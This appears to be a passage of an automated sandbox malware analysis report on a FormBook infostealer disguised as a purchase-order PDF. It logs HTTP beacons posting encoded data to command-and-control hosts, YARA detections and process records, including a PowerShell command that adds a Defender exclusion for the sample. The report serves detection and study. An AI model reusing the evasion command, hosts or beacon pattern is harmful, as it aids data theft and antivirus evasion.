                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 62 42 4f 6b 6e 79 74 69 41 65 41 79 37 69 6f 4b 5a 46 56 7a 4b 49 7a 4d 54 78 69 50 34 30 34 4f 33 66 2b 33 2b 42 47 34 4d 50 55 61 6d 55 55 68 35 37 6f 75 70 73 53 33 4f 75 32 6e 2b 30 63 36 6a 6d 58 49 4d 45 77 31 4a 6d 77 63 7a 53 4f 6d 49 72 6a 49 69 50 42 73 4e 4c 77 59 62 6d 79 6f 2f 74 62 78 41 4a 66 51 37 42 31 68 43 6c 48 34 57 69 66 76 59 79 51 42 41 6c 70 79 43 35 54 74 70 79 44 6e 2b 38 42 33 2b 65 6b 64 33 6c 54 4d 35 33 73 44 43 59 4b 47 68 32 4d 48 53 59 58 52 73 73 30 6e 48 37 38 54 32 59 64 64 6c 62 73 62 41 39 67 4d 71 31 2b 6e 78 43 75 46 46 6f 50 39 58 4d 6d 4d 54 78 33 39 58 4f 66 74 2f 46 71 56 2f 52 52 6d 6b 41 4a 70 57 36 69 4a
                                                                        Data Ascii: J8LHgDJp=bBOknytiAeAy7ioKZFVzKIzMTxiP404O3f+3+BG4MPUamUUh57oupsS3Ou2n+0c6jmXIMEw1JmwczSOmIrjIiPBsNLwYbmyo/tbxAJfQ7B1hClH4WifvYyQBAlpyC5TtpyDn+8B3+ekd3lTM53sDCYKGh2MHSYXRss0nH78T2YddlbsbA9gMq1+nxCuFFoP9XMmMTx39XOft/FqV/RRmkAJpW6iJ


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        51192.168.2.55003213.248.169.48803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:47.383235931 CET1780OUTPOST /xlhb/ HTTP/1.1
                                                                        Host: www.sonoscan.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.sonoscan.org
                                                                        Referer: http://www.sonoscan.org/xlhb/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 62 42 4f 6b 6e 79 74 69 41 65 41 79 37 69 6f 4b 5a 46 56 7a 4b 49 7a 4d 54 78 69 50 34 30 34 4f 33 66 2b 33 2b 42 47 34 4d 4d 30 61 6d 6e 63 68 36 61 6f 75 6f 73 53 33 52 65 32 6d 2b 30 63 64 6a 6d 65 42 4d 45 30 6c 4a 6b 49 63 79 7a 75 6d 4f 66 33 49 72 50 42 73 53 37 77 5a 56 47 79 48 2f 70 2f 31 41 4a 50 51 37 42 31 68 43 6b 33 34 66 54 66 76 4c 69 51 43 44 6c 70 45 49 5a 54 42 70 32 6e 33 2b 38 45 4b 2b 4b 59 64 33 46 44 4d 37 68 77 44 42 34 4b 45 69 32 4d 6c 53 59 54 65 73 73 34 72 48 34 67 39 32 62 4e 64 68 4e 34 41 46 50 38 68 72 6d 57 34 7a 43 37 38 56 76 53 66 4a 74 32 64 51 6d 66 2f 61 76 44 74 33 68 62 54 70 77 38 52 2b 32 78 6b 61 76 36 48 51 35 4b 44 69 79 4b 62 59 4a 76 54 37 7a 63 31 69 63 38 64 31 4f 6a 47 4d 6e 33 6d 72 48 2f 39 6f 53 68 43 76 52 30 71 4c 49 35 52 30 2b 45 77 6a 41 4e 50 78 78 49 33 54 56 32 7a 58 4b 54 67 55 59 75 48 47 64 42 57 4d 7a 64 41 32 67 6e 6c 41 6e 4f 6f 46 64 48 2b 69 7a 30 78 6b 67 6a 73 35 73 2b 64 70 4c 53 62 6e 46 73 57 71 [TRUNCATED]
                                                                        Data Ascii: J8LHgDJp=bBOknytiAeAy7ioKZFVzKIzMTxiP404O3f+3+BG4MM0amnch6aouosS3Re2m+0cdjmeBME0lJkIcyzumOf3IrPBsS7wZVGyH/p/1AJPQ7B1hCk34fTfvLiQCDlpEIZTBp2n3+8EK+KYd3FDM7hwDB4KEi2MlSYTess4rH4g92bNdhN4AFP8hrmW4zC78VvSfJt2dQmf/avDt3hbTpw8R+2xkav6HQ5KDiyKbYJvT7zc1ic8d1OjGMn3mrH/9oShCvR0qLI5R0+EwjANPxxI3TV2zXKTgUYuHGdBWMzdA2gnlAnOoFdH+iz0xkgjs5s+dpLSbnFsWqRiavvPzOSNBsZeOQLfz6MNVQkeA4kte+gvOhFNsU06OoSQhcJjFEhLiq51i62l0N3UEoVJs4UI9d1rPG1EnbqArhglsgGHna9gSLvlabJxOgZOIohqKQv8QzZwL89imRAruc8FXLCQH3IuLY5sNR9xJoxUmi3GTX8mx9yaXMEbVovYSOj0JF+pna3mCsEf/WYthg/Z1E+ObAc7hvy+NdlQB13y9L3lnuKwBlEkGJZ+8ys5sOJnD5yM98YJKHJRdJ+R/Q7Igzh7UxH1cg1nSfngpgbmz9lSojV1CkBFEswe/m3rv8p6D9qZvCbDQXIx7dhzbksL6586/pvaqZ9mN6ltww0WE8HXBDd/KM2UG291wImqn7xTYaAACcOqOj15S65ePYnm9T7WX/55xujoM/6zn1Huef7UnTO2nLco0vpL7rFQ1CypbPsUWIv7I4TFEpa9uvrAXJp0mUP4+SioTOo121T+ss/HLQ0pdRRGK4Xpc9+4A3JCNPM8KsTlTuTzEckMDLlV6v+W6uq1JMcg8VRsVPuHmOHRseXj223ajWz++jTn/lBahOUy1lGbgU+jDogPnCAi8Nrm23CwRItpwSd8Fd7YltItshs6Whxyok2y6+FR7bOk0mJzRC/fLD/MNn/AXlJ99SR/j0U/i9oKRO6ZP/TUgBhCqfjI [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        52192.168.2.55003313.248.169.48803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:49.926085949 CET488OUTGET /xlhb/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=WDmEkFMJCPM0vAdoEgsDaI2zUw+I3BUP6f65xhueHOQTowQnu/4Hj56WOua05lBgvGSvVDcmYnsn0HKnK8OdiO87PbUZXBqH6/yEH6S1yhxHCm7aRAizBR0GDl9YCJCE3A== HTTP/1.1
                                                                        Host: www.sonoscan.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:38:50.598089933 CET414INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Sat, 09 Nov 2024 04:38:50 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 274
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 61 46 3d 4a 4c 70 34 6f 30 51 78 32 46 2d 70 34 46 26 4a 38 4c 48 67 44 4a 70 3d 57 44 6d 45 6b 46 4d 4a 43 50 4d 30 76 41 64 6f 45 67 73 44 61 49 32 7a 55 77 2b 49 33 42 55 50 36 66 36 35 78 68 75 65 48 4f 51 54 6f 77 51 6e 75 2f 34 48 6a 35 36 57 4f 75 61 30 35 6c 42 67 76 47 53 76 56 44 63 6d 59 6e 73 6e 30 48 4b 6e 4b 38 4f 64 69 4f 38 37 50 62 55 5a 58 42 71 48 36 2f 79 45 48 36 53 31 79 68 78 48 43 6d 37 61 52 41 69 7a 42 52 30 47 44 6c 39 59 43 4a 43 45 33 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?aF=JLp4o0Qx2F-p4F&J8LHgDJp=WDmEkFMJCPM0vAdoEgsDaI2zUw+I3BUP6f65xhueHOQTowQnu/4Hj56WOua05lBgvGSvVDcmYnsn0HKnK8OdiO87PbUZXBqH6/yEH6S1yhxHCm7aRAizBR0GDl9YCJCE3A=="}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        53192.168.2.550034156.234.28.94803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:56.292984009 CET740OUTPOST /gv4o/ HTTP/1.1
                                                                        Host: www.jllllbx.top
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.jllllbx.top
                                                                        Referer: http://www.jllllbx.top/gv4o/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 49 71 76 72 67 58 47 63 55 62 44 45 67 52 2f 66 34 69 76 39 44 34 62 53 36 50 73 73 6f 79 43 33 6e 77 6f 30 39 58 59 73 4b 6c 32 6d 4a 35 4c 6f 75 51 55 50 6a 33 38 65 58 56 4b 71 68 66 39 37 35 33 59 59 6c 68 43 70 31 43 52 58 71 75 7a 2b 65 46 4e 78 65 37 6c 39 77 72 39 6f 4d 51 4f 4a 35 32 33 6f 58 77 73 4c 35 44 64 6e 30 7a 61 4f 69 64 55 59 31 59 57 72 69 4f 6d 62 34 6d 75 79 6a 6a 45 62 72 36 70 2f 48 43 55 37 67 4b 53 72 4b 66 31 48 4d 41 35 4d 5a 45 41 2f 57 74 74 43 6e 53 6f 48 47 4e 2f 4b 47 63 4b 33 78 44 43 52 5a 72 58 4f 6a 72 45 75 4c 65 78 79 57 34 45 6f 6c 33 35 4b 47 64 30 3d
                                                                        Data Ascii: J8LHgDJp=IqvrgXGcUbDEgR/f4iv9D4bS6PssoyC3nwo09XYsKl2mJ5LouQUPj38eXVKqhf9753YYlhCp1CRXquz+eFNxe7l9wr9oMQOJ523oXwsL5Ddn0zaOidUY1YWriOmb4muyjjEbr6p/HCU7gKSrKf1HMA5MZEA/WttCnSoHGN/KGcK3xDCRZrXOjrEuLexyW4Eol35KGd0=
                                                                        Nov 9, 2024 05:38:57.244523048 CET1135INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sat, 09 Nov 2024 04:38:57 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 33 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 55 5b 8b 1c 45 14 7e 17 fc 0f 65 2f 86 19 e8 9d ae 5b df 76 ba 07 64 d5 a7 40 04 e3 83 8f bd d3 b5 33 a5 db dd 43 77 ed cc 2c 21 0f 42 40 10 23 fa 24 8a a2 78 c1 80 24 fa 20 28 9a e0 9f c9 ee ac 4f f9 0b 9e 53 35 33 d9 2c ea e6 c5 61 ba 4e 9d 4b 9d cb 57 55 a7 b2 97 5e bd b1 7f f3 ed 37 5e 23 53 53 1d 8d 5e 7c 21 db 52 55 94 c0 93 ac 52 a6 20 e3 69 d1 76 ca e4 de 5b 37 5f df 4d 3c 54 c0 cf e9 74 99 7b 73 ad 16 b3 a6 35 1e a9 8b 4a 5d e4 c7 4d 6d 54 0d 2b 17 ba 34 d3 bc 54 73 3d 56 bb 96 f1 2b 5d eb ea b8 da ed c6 c5 91 ca d9 80 fa 55 b1 bc 24 39 ee 54 6b 0d 8a 03 b0 a9 1b 8c 9d 19 6d 8e d4 e8 da 4e 22 87 d7 76 a2 18 86 98 c1 c0 a5 e4 21 50 c1 68 42 91 17 52 26 c8 f3 30 15 40 25 2a 23 1c ac da 0e 2c 4d e3 14 6d a2 58 88 61 16 38 d7 10 c3 d6 ed aa 79 57 9d 2c 9a b6 ec 3c b2 ad e6 7f 88 ed 05 58 da 85 b0 a5 ea c6 ad 9e 19 dd d4 cf 44 4e 53 86 25 47 21 15 98 f9 7f b3 57 40 74 09 8d 30 14 61 04 3e c3 98 49 c4 96 71 c4 95 51 8c 27 31 98 d3 a2 89 c4 21 75 09 [TRUNCATED]
                                                                        Data Ascii: 396U[E~e/[vd@3Cw,!B@#$x$ (OS53,aNKWU^7^#SS^|!RUR iv[7_M<Tt{s5J]MmT+4Ts=V+]U$9TkmN"v!PhBR&0@%*#,MmXa8yW,<XDNS%G!W@t0a>IqQ'1!uYbaL@X!mdnd[c09R*7) G4>X#a<QaC]>#E):{(pJa,zK0F9C6TwMuPt9U/lN!nFYpaVN)2v[9;;#}ixw_zzP~^R-oB^9e[e3>"$V>YoO;vuu?OW?}=<|1'3hVF-MN1/y!9yGP@hA2?c"?MSt FCkpqt"-V[x9:-[cFY3,=BUNtO,b/X@UZjv_Lar0K='a|Yd0e@xt1X;0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        54192.168.2.550035156.234.28.94803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:38:59.405647993 CET760OUTPOST /gv4o/ HTTP/1.1
                                                                        Host: www.jllllbx.top
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.jllllbx.top
                                                                        Referer: http://www.jllllbx.top/gv4o/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 49 71 76 72 67 58 47 63 55 62 44 45 68 78 50 66 36 45 6e 39 4c 34 62 52 2f 50 73 73 69 53 44 38 6e 78 55 30 39 54 41 43 4c 57 65 6d 4a 62 54 6f 76 56 6f 50 6b 33 38 65 50 6c 4b 72 73 2f 38 57 35 33 56 79 6c 68 75 70 31 43 31 58 71 76 44 2b 65 32 31 79 65 72 6c 2f 38 4c 39 71 44 77 4f 4a 35 32 33 6f 58 30 46 67 35 44 56 6e 31 44 71 4f 69 38 55 66 32 59 57 6f 6c 4f 6d 62 31 47 75 70 6a 6a 46 34 72 2b 4a 56 48 45 49 37 67 50 32 72 4b 71 42 41 47 41 34 48 61 30 42 74 5a 65 51 6e 75 6b 6b 4e 4d 2f 4b 78 65 2f 32 54 30 31 7a 37 44 4a 66 6d 77 4c 6f 57 62 4e 35 46 48 49 6c 42 2f 55 70 36 59 4b 68 6e 59 76 74 6a 53 63 38 45 57 30 32 70 73 4f 5a 61 41 31 41 5a
                                                                        Data Ascii: J8LHgDJp=IqvrgXGcUbDEhxPf6En9L4bR/PssiSD8nxU09TACLWemJbTovVoPk38ePlKrs/8W53Vylhup1C1XqvD+e21yerl/8L9qDwOJ523oX0Fg5DVn1DqOi8Uf2YWolOmb1GupjjF4r+JVHEI7gP2rKqBAGA4Ha0BtZeQnukkNM/Kxe/2T01z7DJfmwLoWbN5FHIlB/Up6YKhnYvtjSc8EW02psOZaA1AZ
                                                                        Nov 9, 2024 05:39:00.362777948 CET1135INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sat, 09 Nov 2024 04:39:00 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 33 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 55 5b 8b 1c 45 14 7e 17 fc 0f 65 2f 86 19 e8 9d ae 5b df 76 ba 07 64 d5 a7 40 04 e3 83 8f bd d3 b5 33 a5 db dd 43 77 ed cc 2c 21 0f 42 40 10 23 fa 24 8a a2 78 c1 80 24 fa 20 28 9a e0 9f c9 ee ac 4f f9 0b 9e 53 35 33 d9 2c ea e6 c5 61 ba 4e 9d 4b 9d cb 57 55 a7 b2 97 5e bd b1 7f f3 ed 37 5e 23 53 53 1d 8d 5e 7c 21 db 52 55 94 c0 93 ac 52 a6 20 e3 69 d1 76 ca e4 de 5b 37 5f df 4d 3c 54 c0 cf e9 74 99 7b 73 ad 16 b3 a6 35 1e a9 8b 4a 5d e4 c7 4d 6d 54 0d 2b 17 ba 34 d3 bc 54 73 3d 56 bb 96 f1 2b 5d eb ea b8 da ed c6 c5 91 ca d9 80 fa 55 b1 bc 24 39 ee 54 6b 0d 8a 03 b0 a9 1b 8c 9d 19 6d 8e d4 e8 da 4e 22 87 d7 76 a2 18 86 98 c1 c0 a5 e4 21 50 c1 68 42 91 17 52 26 c8 f3 30 15 40 25 2a 23 1c ac da 0e 2c 4d e3 14 6d a2 58 88 61 16 38 d7 10 c3 d6 ed aa 79 57 9d 2c 9a b6 ec 3c b2 ad e6 7f 88 ed 05 58 da 85 b0 a5 ea c6 ad 9e 19 dd d4 cf 44 4e 53 86 25 47 21 15 98 f9 7f b3 57 40 74 09 8d 30 14 61 04 3e c3 98 49 c4 96 71 c4 95 51 8c 27 31 98 d3 a2 89 c4 21 75 09 [TRUNCATED]
                                                                        Data Ascii: 396U[E~e/[vd@3Cw,!B@#$x$ (OS53,aNKWU^7^#SS^|!RUR iv[7_M<Tt{s5J]MmT+4Ts=V+]U$9TkmN"v!PhBR&0@%*#,MmXa8yW,<XDNS%G!W@t0a>IqQ'1!uYbaL@X!mdnd[c09R*7) G4>X#a<QaC]>#E):{(pJa,zK0F9C6TwMuPt9U/lN!nFYpaVN)2v[9;;#}ixw_zzP~^R-oB^9e[e3>"$V>YoO;vuu?OW?}=<|1'3hVF-MN1/y!9yGP@hA2?c"?MSt FCkpqt"-V[x9:-[cFY3,=BUNtO,b/X@UZjv_Lar0K='a|Yd0e@xt1X;0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        55192.168.2.550036156.234.28.9480
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:39:02.287245989 CET1777OUTPOST /gv4o/ HTTP/1.1
                                                                        Host: www.jllllbx.top
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.jllllbx.top
                                                                        Referer: http://www.jllllbx.top/gv4o/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 49 71 76 72 67 58 47 63 55 62 44 45 68 78 50 66 36 45 6e 39 4c 34 62 52 2f 50 73 73 69 53 44 38 6e 78 55 30 39 54 41 43 4c 57 47 6d 4a 6f 62 6f 75 79 38 50 6c 33 38 65 47 46 4b 32 73 2f 38 75 35 32 39 70 6c 68 53 54 31 45 78 58 6f 4a 2f 2b 59 48 31 79 51 72 6c 2f 30 72 39 70 4d 51 50 4c 35 79 71 68 58 77 68 67 35 44 56 6e 31 41 79 4f 6c 74 55 66 35 34 57 72 69 4f 6d 66 34 6d 76 6e 6a 6a 4d 44 72 34 56 76 48 33 51 37 68 76 47 72 61 4d 74 41 4b 41 34 46 54 6b 41 6f 5a 65 63 30 75 69 41 6e 4d 37 4b 4c 65 2f 65 54 30 30 43 51 48 71 58 73 7a 34 63 32 63 2b 31 47 52 4f 5a 62 68 30 4d 4c 65 36 39 36 61 63 74 67 63 59 59 75 65 56 54 42 2b 34 77 4d 4b 7a 4a 59 45 4a 67 41 45 51 47 5a 45 77 59 36 4c 34 33 79 31 49 39 62 6f 67 7a 57 59 37 58 65 64 62 6b 48 31 61 48 4b 58 55 56 68 35 4f 56 4f 50 61 4e 6f 51 36 51 79 47 75 31 70 70 45 75 59 49 43 34 43 53 77 78 77 74 39 37 66 35 46 35 38 30 51 32 53 56 47 65 59 7a 4f 6d 48 32 36 32 63 58 36 72 6a 53 2f 41 54 55 45 7a 44 71 72 46 50 66 [TRUNCATED]
                                                                        Data Ascii: J8LHgDJp=IqvrgXGcUbDEhxPf6En9L4bR/PssiSD8nxU09TACLWGmJobouy8Pl38eGFK2s/8u529plhST1ExXoJ/+YH1yQrl/0r9pMQPL5yqhXwhg5DVn1AyOltUf54WriOmf4mvnjjMDr4VvH3Q7hvGraMtAKA4FTkAoZec0uiAnM7KLe/eT00CQHqXsz4c2c+1GROZbh0MLe696actgcYYueVTB+4wMKzJYEJgAEQGZEwY6L43y1I9bogzWY7XedbkH1aHKXUVh5OVOPaNoQ6QyGu1ppEuYIC4CSwxwt97f5F580Q2SVGeYzOmH262cX6rjS/ATUEzDqrFPfS+Mbf6IlbqUCu6k8QRfT9GgLTAefUIc7bWMiERYzm40nljWA1x6mb1dRZ9VEeItk8M8BiiNhE+mMa/EhZNW/6TVc7vJTOLDNPsGHTRKJtAkjz+PhnSsJP2Z5aOOZitB9WQ+VZEQUXI67bGyy/19KROPZrTNUVCTphmP4vlBFMrwrczIzlWLAgz12M0HgVDSf8y3/AgC+gUPuZn4jl6GjhcknEkZOgtfncpVsW4ybPT4COZiBo+9KumI4CdR7rBOx5X6bzD/97jBo3Zk9iQuyZ3qI7m2LALXIsyNCNMJXhSBMLK3Mj8TMnNM+S6CB4oVQrtvGQ2Adf64fUPktXVzuX0sjCiNjJTL+Rngn+XZlkHXFofH7MRaxDSczqEgGRA8KSto+6Lq1BaJQfjpYDuJ2JQENgEnOiWsQ+/neslW/0c1uxnGESLeD3roapAXXpUVzXT+DtMCiwjnNJdBxrP+IrUeetN2MKu2MZ9CDE8PDLGgO1WtAvSXQhVNrCpa7YNmjs8woHG2rbRLDhvNFEX1SutcFYAvaAsNMtYjZ2LC9Ii1u42rNyLnjwOjr5Nu9lcEY2GmiNODhlCBzfOtT0CncYWPKMtstK84vu8Pw6/i06oVrNSYkYYcMfBTE98q19eCBC5JqpxtKmDQ4EoYBW4W96e7TBZSf1Yk+zf [TRUNCATED]
                                                                        Nov 9, 2024 05:39:03.235816956 CET1135INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Sat, 09 Nov 2024 04:39:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 33 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 55 5b 8b 1c 45 14 7e 17 fc 0f 65 2f 86 19 e8 9d ae 5b df 76 ba 07 64 d5 a7 40 04 e3 83 8f bd d3 b5 33 a5 db dd 43 77 ed cc 2c 21 0f 42 40 10 23 fa 24 8a a2 78 c1 80 24 fa 20 28 9a e0 9f c9 ee ac 4f f9 0b 9e 53 35 33 d9 2c ea e6 c5 61 ba 4e 9d 4b 9d cb 57 55 a7 b2 97 5e bd b1 7f f3 ed 37 5e 23 53 53 1d 8d 5e 7c 21 db 52 55 94 c0 93 ac 52 a6 20 e3 69 d1 76 ca e4 de 5b 37 5f df 4d 3c 54 c0 cf e9 74 99 7b 73 ad 16 b3 a6 35 1e a9 8b 4a 5d e4 c7 4d 6d 54 0d 2b 17 ba 34 d3 bc 54 73 3d 56 bb 96 f1 2b 5d eb ea b8 da ed c6 c5 91 ca d9 80 fa 55 b1 bc 24 39 ee 54 6b 0d 8a 03 b0 a9 1b 8c 9d 19 6d 8e d4 e8 da 4e 22 87 d7 76 a2 18 86 98 c1 c0 a5 e4 21 50 c1 68 42 91 17 52 26 c8 f3 30 15 40 25 2a 23 1c ac da 0e 2c 4d e3 14 6d a2 58 88 61 16 38 d7 10 c3 d6 ed aa 79 57 9d 2c 9a b6 ec 3c b2 ad e6 7f 88 ed 05 58 da 85 b0 a5 ea c6 ad 9e 19 dd d4 cf 44 4e 53 86 25 47 21 15 98 f9 7f b3 57 40 74 09 8d 30 14 61 04 3e c3 98 49 c4 96 71 c4 95 51 8c 27 31 98 d3 a2 89 c4 21 75 09 [TRUNCATED]
                                                                        Data Ascii: 396U[E~e/[vd@3Cw,!B@#$x$ (OS53,aNKWU^7^#SS^|!RUR iv[7_M<Tt{s5J]MmT+4Ts=V+]U$9TkmN"v!PhBR&0@%*#,MmXa8yW,<XDNS%G!W@t0a>IqQ'1!uYbaL@X!mdnd[c09R*7) G4>X#a<QaC]>#E):{(pJa,zK0F9C6TwMuPt9U/lN!nFYpaVN)2v[9;;#}ixw_zzP~^R-oB^9e[e3>"$V>YoO;vuu?OW?}=<|1'3hVF-MN1/y!9yGP@hA2?c"?MSt FCkpqt"-V[x9:-[cFY3,=BUNtO,b/X@UZjv_Lar0K='a|Yd0e@xt1X;0


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:23:34:53
                                                                        Start date:08/11/2024
                                                                        Path:C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"
                                                                        Imagebase:0x200000
                                                                        File size:896'000 bytes
                                                                        MD5 hash:F946F99DF4C8406BA19B70561C1D53F6
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:23:34:55
                                                                        Start date:08/11/2024
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"
                                                                        Imagebase:0xc00000
                                                                        File size:433'152 bytes
                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:4
                                                                        Start time:23:34:55
                                                                        Start date:08/11/2024
                                                                        Path:C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe"
                                                                        Imagebase:0x5f0000
                                                                        File size:896'000 bytes
                                                                        MD5 hash:F946F99DF4C8406BA19B70561C1D53F6
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2238337409.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2221565153.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:5
                                                                        Start time:23:34:55
                                                                        Start date:08/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
